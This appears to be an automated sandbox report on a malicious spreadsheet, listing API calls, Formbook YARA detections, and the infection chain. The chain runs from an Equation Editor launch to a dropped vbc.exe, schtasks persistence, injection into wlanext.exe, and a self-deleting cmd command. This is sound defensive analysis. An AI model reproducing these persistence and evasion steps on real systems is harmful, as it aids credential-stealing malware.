          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FA20 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FA50 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FB50 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FC30 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00870C40 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FC48 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00871D80 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FD5C NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FE24 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FFFC NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0086FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F907AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F901D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F91148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F910D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F90078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F90060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F90048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F91930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F91D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F90C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00098270 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000982F0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000983A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000981BA NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009826A NtReadFile,
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00198D5D
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00278CA2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002700E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00272528
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00273551
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00274598
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0027B62C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0027B208
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00275A78
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00277738
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0027A04A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0027A050
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00272518
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002742E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00270700
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0465307D
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04657094
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041B8A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041C23F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041C2AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041C3DF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041CC13
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041B4A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041BD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041BE60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041C603
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0087E0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008AD005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00883040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0089905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0087E2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00921238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0087F3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008A63DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00882305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00887353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008CA37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00891489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008B5485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008BD47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0089C5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0088351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008C6540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00884680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0088E6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00922622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0090579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0088C7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008B57C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0091F8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0088C85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008A286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0092098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008829B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008969FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00905955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00933A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0092CBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0090DBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0087FBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008A7B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0091FDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008B0D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0088CD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008B2E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0089EE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00890F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008ADF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02041238
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9E0C6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB905A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA3040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FCD005
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FC63DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9F3CF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FEA37B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA7353
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA2305
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9E2E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FBC5F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02042622
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FE6540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA351F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB1489
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FD5485
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FDD47D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202579A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FD57C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FAC7BC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FAE6C1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA4680
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB69FE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA29B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02053A83
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FC286D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204CBA4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FAC85C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202DBDA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9FBD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203F8EE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FC7B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02025955
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204098E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FACD5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FD0D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FCDF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB0F3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FBEE4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FD2E2F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203FDDD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009C603
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CC13
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00088C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00082FB0
          Source: Order_00009.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01F9DF5C appears 118 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0200F970 appears 81 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01F9E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FE3F92 appears 108 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FE373B appears 238 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0087DF5C appears 113 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 008EF970 appears 81 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 008C373B appears 238 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 008C3F92 appears 108 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0087E2A8 appears 38 times
          Source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: file2[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JcEEHoQdnETCO.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 4.0.vbc.exe.190000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: 4.0.vbc.exe.190000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 4.0.vbc.exe.190000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: file2[1].exe.2.dr, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: file2[1].exe.2.dr, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: file2[1].exe.2.dr, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 4.2.vbc.exe.190000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: 4.2.vbc.exe.190000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 4.2.vbc.exe.190000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: JcEEHoQdnETCO.exe.4.dr, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: JcEEHoQdnETCO.exe.4.dr, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: JcEEHoQdnETCO.exe.4.dr, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/8@13/4
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Order_00009.xlsxJump to behavior
          Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\BrtavqaRGzDKtjCLSCLufFEEs
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRAB9.tmpJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................ .......................(.P.............................9.......................................................................
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Order_00009.xlsxVirustotal: Detection: 30%
          Source: Order_00009.xlsxReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
